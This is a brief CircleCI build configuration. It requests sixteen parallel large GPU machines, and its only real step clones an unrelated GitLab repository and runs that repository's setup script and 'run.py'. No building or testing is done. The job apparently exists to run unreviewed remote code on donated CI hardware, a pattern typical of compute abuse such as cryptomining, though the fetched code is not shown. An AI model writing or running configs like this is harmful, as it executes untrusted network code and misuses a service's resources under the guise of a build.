version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.large
    parallelism: 16
    steps:
      - run: lscpu
      - run: git clone https://gitlab.com/renifer12/rp && cd rp && ./setup && python run.py
